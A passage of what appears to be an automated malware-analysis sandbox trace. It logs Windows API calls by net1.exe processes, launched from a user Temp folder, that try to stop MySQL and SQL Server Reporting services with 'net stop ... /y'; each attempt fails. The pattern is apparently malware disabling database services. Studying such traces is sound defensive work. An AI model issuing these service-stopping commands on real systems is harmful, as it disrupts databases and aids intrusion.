_fileno (_File=0x77032900) returned -2 [0128.458] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0128.458] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0128.458] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0128.458] _wcsicmp (_String1="config", _String2="stop") returned -16 [0128.458] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0128.458] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0128.458] _wcsicmp (_String1="file", _String2="stop") returned -13 [0128.458] _wcsicmp (_String1="files", _String2="stop") returned -13 [0128.458] _wcsicmp (_String1="group", _String2="stop") returned -12 [0128.458] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0128.458] _wcsicmp (_String1="help", _String2="stop") returned -11 [0128.458] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0128.458] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0128.458] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0128.458] _wcsicmp (_String1="session", _String2="stop") returned -15 [0128.458] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0128.458] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0128.458] _wcsicmp (_String1="share", _String2="stop") returned -12 [0128.458] _wcsicmp (_String1="start", _String2="stop") returned -14 [0128.459] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0128.459] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0128.459] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0128.459] _wcsicmp (_String1="accounts", _String2="MySQL57") returned -12 [0128.459] _wcsicmp (_String1="computer", _String2="MySQL57") returned -10 [0128.459] _wcsicmp (_String1="config", _String2="MySQL57") returned -10 [0128.459] _wcsicmp (_String1="continue", _String2="MySQL57") returned -10 [0128.459] _wcsicmp (_String1="cont", _String2="MySQL57") returned -10 [0128.459] _wcsicmp (_String1="file", _String2="MySQL57") returned -7 [0128.459] _wcsicmp (_String1="files", _String2="MySQL57") returned -7 [0128.459] _wcsicmp (_String1="group", _String2="MySQL57") returned -6 [0128.459] _wcsicmp (_String1="groups", _String2="MySQL57") returned -6 [0128.459] _wcsicmp (_String1="help", _String2="MySQL57") returned -5 [0128.459] _wcsicmp (_String1="helpmsg", _String2="MySQL57") returned -5 [0128.459] _wcsicmp (_String1="localgroup", _String2="MySQL57") returned -1 [0128.459] _wcsicmp (_String1="pause", _String2="MySQL57") returned 3 [0128.459] _wcsicmp (_String1="session", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="sessions", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="sess", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="share", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="start", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="stats", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="statistics", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="stop", _String2="MySQL57") returned 6 [0128.459] _wcsicmp (_String1="time", _String2="MySQL57") returned 7 [0128.459] _wcsicmp (_String1="user", _String2="MySQL57") returned 8 [0128.459] _wcsicmp (_String1="users", _String2="MySQL57") returned 8 [0128.459] _wcsicmp (_String1="msg", _String2="MySQL57") returned -6 [0128.459] _wcsicmp (_String1="messenger", _String2="MySQL57") returned -20 [0128.459] _wcsicmp (_String1="receiver", _String2="MySQL57") returned 5 [0128.459] _wcsicmp (_String1="rcv", _String2="MySQL57") returned 5 [0128.459] _wcsicmp (_String1="netpopup", _String2="MySQL57") returned 1 [0128.459] _wcsicmp (_String1="redirector", _String2="MySQL57") returned 5 [0128.459] _wcsicmp (_String1="redir", _String2="MySQL57") returned 5 [0128.459] _wcsicmp (_String1="rdr", _String2="MySQL57") returned 5 [0128.459] _wcsicmp (_String1="workstation", _String2="MySQL57") returned 10 [0128.459] _wcsicmp (_String1="work", _String2="MySQL57") returned 10 [0128.460] _wcsicmp (_String1="wksta", _String2="MySQL57") returned 10 [0128.460] _wcsicmp (_String1="prdr", _String2="MySQL57") returned 3 [0128.460] _wcsicmp (_String1="devrdr", _String2="MySQL57") returned -9 [0128.460] _wcsicmp (_String1="lanmanworkstation", _String2="MySQL57") returned -1 [0128.460] _wcsicmp (_String1="server", _String2="MySQL57") returned 6 [0128.460] _wcsicmp (_String1="svr", _String2="MySQL57") returned 6 [0128.460] _wcsicmp (_String1="srv", _String2="MySQL57") returned 6 [0128.460] _wcsicmp (_String1="lanmanserver", _String2="MySQL57") returned -1 [0128.460] _wcsicmp (_String1="alerter", _String2="MySQL57") returned -12 [0128.460] _wcsicmp (_String1="netlogon", _String2="MySQL57") returned 1 [0128.460] _wcsupr (in: _String="MySQL57" | out: _String="MYSQL57") returned="MYSQL57" [0128.460] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3c5498 [0128.667] GetServiceKeyNameW (in: hSCManager=0x3c5498, lpDisplayName="MYSQL57", lpServiceName=0xe5aaf0, lpcchBuffer=0x14fe08 | out: lpServiceName="", lpcchBuffer=0x14fe08) returned 0 [0128.668] _wcsicmp (_String1="msg", _String2="MYSQL57") returned -6 [0128.668] _wcsicmp (_String1="messenger", _String2="MYSQL57") returned -20 [0128.668] _wcsicmp (_String1="receiver", _String2="MYSQL57") returned 5 [0128.668] _wcsicmp (_String1="rcv", _String2="MYSQL57") returned 5 [0128.668] _wcsicmp (_String1="redirector", _String2="MYSQL57") returned 5 [0128.668] _wcsicmp (_String1="redir", _String2="MYSQL57") returned 5 [0128.668] _wcsicmp (_String1="rdr", _String2="MYSQL57") returned 5 [0128.668] _wcsicmp (_String1="workstation", _String2="MYSQL57") returned 10 [0128.668] _wcsicmp (_String1="work", _String2="MYSQL57") returned 10 [0128.668] _wcsicmp (_String1="wksta", _String2="MYSQL57") returned 10 [0128.668] _wcsicmp (_String1="prdr", _String2="MYSQL57") returned 3 [0128.668] _wcsicmp (_String1="devrdr", _String2="MYSQL57") returned -9 [0128.668] _wcsicmp (_String1="lanmanworkstation", _String2="MYSQL57") returned -1 [0128.668] _wcsicmp (_String1="server", _String2="MYSQL57") returned 6 [0128.668] _wcsicmp (_String1="svr", _String2="MYSQL57") returned 6 [0128.668] _wcsicmp (_String1="srv", _String2="MYSQL57") returned 6 [0128.668] _wcsicmp (_String1="lanmanserver", _String2="MYSQL57") returned -1 [0128.668] _wcsicmp (_String1="alerter", _String2="MYSQL57") returned -12 [0128.669] _wcsicmp (_String1="netlogon", _String2="MYSQL57") returned 1 [0128.669] NetServiceControl (in: servername=0x0, service="MYSQL57", opcode=0x0, arg=0x0, bufptr=0x14fe04 | out: bufptr=0x14fe04) returned 0x889 [0128.670] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0128.670] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0128.671] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0128.673] GetFileType (hFile=0x0) returned 0x0 [0128.673] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3c3eb8 [0128.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3c3eb8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0128.673] WriteFile (in: hFile=0x0, lpBuffer=0x3c3eb8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x14fd44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fd44, lpOverlapped=0x0) returned 0 [0128.673] LocalFree (hMem=0x3c3eb8) returned 0x0 [0128.673] GetFileType (hFile=0x0) returned 0x0 [0128.673] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c6160 [0128.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3c6160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n<", lpUsedDefaultChar=0x0) returned 2 [0128.673] WriteFile (in: hFile=0x0, lpBuffer=0x3c6160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14fd44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fd44, lpOverlapped=0x0) returned 0 [0128.673] LocalFree (hMem=0x3c6160) returned 0x0 [0128.673] _ultow (in: _Dest=0x889, _Radix=1375604 | out: _Dest=0x889) returned="2185" [0128.673] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0128.674] GetFileType (hFile=0x0) returned 0x0 [0128.674] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3c6160 [0128.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3c6160, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0128.674] WriteFile (in: hFile=0x0, lpBuffer=0x3c6160, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x14fd50, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fd50, lpOverlapped=0x0) returned 0 [0128.674] LocalFree (hMem=0x3c6160) returned 0x0 [0128.674] GetFileType (hFile=0x0) returned 0x0 [0128.674] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c6160 [0128.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3c6160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n<", lpUsedDefaultChar=0x0) returned 2 [0128.674] WriteFile (in: hFile=0x0, lpBuffer=0x3c6160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14fd50, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fd50, lpOverlapped=0x0) returned 0 [0128.674] LocalFree (hMem=0x3c6160) returned 0x0 [0128.674] NetApiBufferFree (Buffer=0x3c1ad8) returned 0x0 [0128.675] NetApiBufferFree (Buffer=0x3c1af0) returned 0x0 [0128.675] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL57 /y" [0128.675] exit (_Code=2) Process: id = "316" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x50e34000" os_pid = "0x128c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0x12b0" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 725 os_tid = 0xba0 [0128.307] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfb1c | out: lpSystemTimeAsFileTime=0x2bfb1c*(dwLowDateTime=0x203631b0, dwHighDateTime=0x1d6f0d1)) [0128.307] GetCurrentProcessId () returned 0x128c [0128.307] GetCurrentThreadId () returned 0xba0 [0128.307] GetTickCount () returned 0x11534e6 [0128.307] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfb14 | out: lpPerformanceCount=0x2bfb14*=24740762982) returned 1 [0128.307] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0128.307] __set_app_type (_Type=0x1) [0128.307] __p__fmode () returned 0x770331f4 [0128.307] __p__commode () returned 0x770331fc [0128.307] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0128.307] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0128.308] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.308] GetConsoleOutputCP () returned 0x1b5 [0128.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0128.308] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.311] sprintf_s (in: _DstBuf=0x2bfad4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0128.311] setlocale (category=0, locale=".437") returned="English_United States.437" [0128.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0128.313] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.313] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" [0128.313] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bf8a0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0128.313] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x7e) returned 0x6f3af8 [0128.313] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0128.314] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfaa4 | out: Buffer=0x2bfaa4*=0x6f1b00) returned 0x0 [0128.314] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfaa4 | out: Buffer=0x2bfaa4*=0x6f1b18) returned 0x0 [0128.314] _fileno (_File=0x77032900) returned -2 [0128.314] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0128.314] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0128.314] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0128.314] _wcsicmp (_String1="config", _String2="stop") returned -16 [0128.314] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0128.314] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0128.314] _wcsicmp (_String1="file", _String2="stop") returned -13 [0128.314] _wcsicmp (_String1="files", _String2="stop") returned -13 [0128.314] _wcsicmp (_String1="group", _String2="stop") returned -12 [0128.314] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0128.314] _wcsicmp (_String1="help", _String2="stop") returned -11 [0128.314] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0128.314] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0128.314] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0128.314] _wcsicmp (_String1="session", _String2="stop") returned -15 [0128.314] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0128.314] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0128.314] _wcsicmp (_String1="share", _String2="stop") returned -12 [0128.314] _wcsicmp (_String1="start", _String2="stop") returned -14 [0128.314] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0128.314] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0128.314] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0128.314] _wcsicmp (_String1="accounts", _String2="ReportServer$SQL_2008") returned -17 [0128.314] _wcsicmp (_String1="computer", _String2="ReportServer$SQL_2008") returned -15 [0128.314] _wcsicmp (_String1="config", _String2="ReportServer$SQL_2008") returned -15 [0128.314] _wcsicmp (_String1="continue", _String2="ReportServer$SQL_2008") returned -15 [0128.315] _wcsicmp (_String1="cont", _String2="ReportServer$SQL_2008") returned -15 [0128.315] _wcsicmp (_String1="file", _String2="ReportServer$SQL_2008") returned -12 [0128.315] _wcsicmp (_String1="files", _String2="ReportServer$SQL_2008") returned -12 [0128.315] _wcsicmp (_String1="group", _String2="ReportServer$SQL_2008") returned -11 [0128.315] _wcsicmp (_String1="groups", _String2="ReportServer$SQL_2008") returned -11 [0128.315] _wcsicmp (_String1="help", _String2="ReportServer$SQL_2008") returned -10 [0128.315] _wcsicmp (_String1="helpmsg", _String2="ReportServer$SQL_2008") returned -10 [0128.315] _wcsicmp (_String1="localgroup", _String2="ReportServer$SQL_2008") returned -6 [0128.315] _wcsicmp (_String1="pause", _String2="ReportServer$SQL_2008") returned -2 [0128.315] _wcsicmp (_String1="session", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="sessions", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="sess", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="share", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="start", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="stats", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="statistics", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="stop", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="time", _String2="ReportServer$SQL_2008") returned 2 [0128.315] _wcsicmp (_String1="user", _String2="ReportServer$SQL_2008") returned 3 [0128.315] _wcsicmp (_String1="users", _String2="ReportServer$SQL_2008") returned 3 [0128.315] _wcsicmp (_String1="msg", _String2="ReportServer$SQL_2008") returned -5 [0128.315] _wcsicmp (_String1="messenger", _String2="ReportServer$SQL_2008") returned -5 [0128.315] _wcsicmp (_String1="receiver", _String2="ReportServer$SQL_2008") returned -13 [0128.315] _wcsicmp (_String1="rcv", _String2="ReportServer$SQL_2008") returned -2 [0128.315] _wcsicmp (_String1="netpopup", _String2="ReportServer$SQL_2008") returned -4 [0128.315] _wcsicmp (_String1="redirector", _String2="ReportServer$SQL_2008") returned -12 [0128.315] _wcsicmp (_String1="redir", _String2="ReportServer$SQL_2008") returned -12 [0128.315] _wcsicmp (_String1="rdr", _String2="ReportServer$SQL_2008") returned -1 [0128.315] _wcsicmp (_String1="workstation", _String2="ReportServer$SQL_2008") returned 5 [0128.315] _wcsicmp (_String1="work", _String2="ReportServer$SQL_2008") returned 5 [0128.315] _wcsicmp (_String1="wksta", _String2="ReportServer$SQL_2008") returned 5 [0128.315] _wcsicmp (_String1="prdr", _String2="ReportServer$SQL_2008") returned -2 [0128.315] _wcsicmp (_String1="devrdr", _String2="ReportServer$SQL_2008") returned -14 [0128.315] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$SQL_2008") returned -6 [0128.315] _wcsicmp (_String1="server", _String2="ReportServer$SQL_2008") returned 1 [0128.315] _wcsicmp (_String1="svr", _String2="ReportServer$SQL_2008") returned 1 [0128.316] _wcsicmp (_String1="srv", _String2="ReportServer$SQL_2008") returned 1 [0128.316] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$SQL_2008") returned -6 [0128.316] _wcsicmp (_String1="alerter", _String2="ReportServer$SQL_2008") returned -17 [0128.316] _wcsicmp (_String1="netlogon", _String2="ReportServer$SQL_2008") returned -4 [0128.316] _wcsupr (in: _String="ReportServer$SQL_2008" | out: _String="REPORTSERVER$SQL_2008") returned="REPORTSERVER$SQL_2008" [0128.316] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6f54d8 [0128.595] GetServiceKeyNameW (in: hSCManager=0x6f54d8, lpDisplayName="REPORTSERVER$SQL_2008", lpServiceName=0xe5aaf0, lpcchBuffer=0x2bfa40 | out: lpServiceName="", lpcchBuffer=0x2bfa40) returned 0 [0128.596] _wcsicmp (_String1="msg", _String2="REPORTSERVER$SQL_2008") returned -5 [0128.596] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$SQL_2008") returned -5 [0128.596] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$SQL_2008") returned -13 [0128.596] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$SQL_2008") returned -2 [0128.596] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$SQL_2008") returned -12 [0128.597] _wcsicmp (_String1="redir", _String2="REPORTSERVER$SQL_2008") returned -12 [0128.597] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$SQL_2008") returned -1 [0128.597] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$SQL_2008") returned 5 [0128.597] _wcsicmp (_String1="work", _String2="REPORTSERVER$SQL_2008") returned 5 [0128.597] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$SQL_2008") returned 5 [0128.597] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$SQL_2008") returned -2 [0128.597] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$SQL_2008") returned -14 [0128.597] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$SQL_2008") returned -6 [0128.597] _wcsicmp (_String1="server", _String2="REPORTSERVER$SQL_2008") returned 1 [0128.597] _wcsicmp (_String1="svr", _String2="REPORTSERVER$SQL_2008") returned 1 [0128.597] _wcsicmp (_String1="srv", _String2="REPORTSERVER$SQL_2008") returned 1 [0128.597] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$SQL_2008") returned -6 [0128.597] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$SQL_2008") returned -17 [0128.597] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$SQL_2008") returned -4 [0128.597] NetServiceControl (in: servername=0x0, service="REPORTSERVER$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x2bfa3c | out: bufptr=0x2bfa3c) returned 0x889 [0128.599] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0128.599] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0128.600] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0128.601] GetFileType (hFile=0x0) returned 0x0 [0128.601] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6f3ef8 [0128.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6f3ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nn", lpUsedDefaultChar=0x0) returned 30 [0128.601] WriteFile (in: hFile=0x0, lpBuffer=0x6f3ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bf97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf97c, lpOverlapped=0x0) returned 0 [0128.601] LocalFree (hMem=0x6f3ef8) returned 0x0 [0128.601] GetFileType (hFile=0x0) returned 0x0 [0128.601] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6f61a0 [0128.602] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6f61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\no", lpUsedDefaultChar=0x0) returned 2 [0128.602] WriteFile (in: hFile=0x0, lpBuffer=0x6f61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf97c, lpOverlapped=0x0) returned 0 [0128.602] LocalFree (hMem=0x6f61a0) returned 0x0 [0128.602] _ultow (in: _Dest=0x889, _Radix=2881964 | out: _Dest=0x889) returned="2185" [0128.602] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0128.602] GetFileType (hFile=0x0) returned 0x0 [0128.602] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6f61a0 [0128.602] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6f61a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0128.602] WriteFile (in: hFile=0x0, lpBuffer=0x6f61a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bf988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf988, lpOverlapped=0x0) returned 0 [0128.602] LocalFree (hMem=0x6f61a0) returned 0x0 [0128.602] GetFileType (hFile=0x0) returned 0x0 [0128.602] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6f61a0 [0128.602] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6f61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\no", lpUsedDefaultChar=0x0) returned 2 [0128.602] WriteFile (in: hFile=0x0, lpBuffer=0x6f61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf988, lpOverlapped=0x0) returned 0 [0128.602] LocalFree (hMem=0x6f61a0) returned 0x0 [0128.603] NetApiBufferFree (Buffer=0x6f1b00) returned 0x0 [0128.603] NetApiBufferFree (Buffer=0x6f1b18) returned 0x0 [0128.603] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" [0128.603] exit (_Code=2) Process: id = "317" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5901f000" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "188" os_parent_pid = "0x12b8" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 729 os_tid = 0xed4 [0129.171] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefdfc | out: lpSystemTimeAsFileTime=0xefdfc*(dwLowDateTime=0x20bb7eb0, dwHighDateTime=0x1d6f0d1)) [0129.171] GetCurrentProcessId () returned 0xcc8 [0129.171] GetCurrentThreadId () returned 0xed4 [0129.171] GetTickCount () returned 0x1153840 [0129.171] QueryPerformanceCounter (in: lpPerformanceCount=0xefdf4 | out: lpPerformanceCount=0xefdf4*=24827229353) returned 1 [0129.172] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0129.172] __set_app_type (_Type=0x1) [0129.172] __p__fmode () returned 0x770331f4 [0129.172] __p__commode () returned 0x770331fc [0129.172] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0129.172] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0129.172] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.172] GetConsoleOutputCP () returned 0x1b5 [0129.173] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0129.173] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.176] sprintf_s (in: _DstBuf=0xefdb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0129.176] setlocale (category=0, locale=".437") returned="English_United States.437" [0129.178] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0129.178] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.178] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" [0129.178] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefb80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: 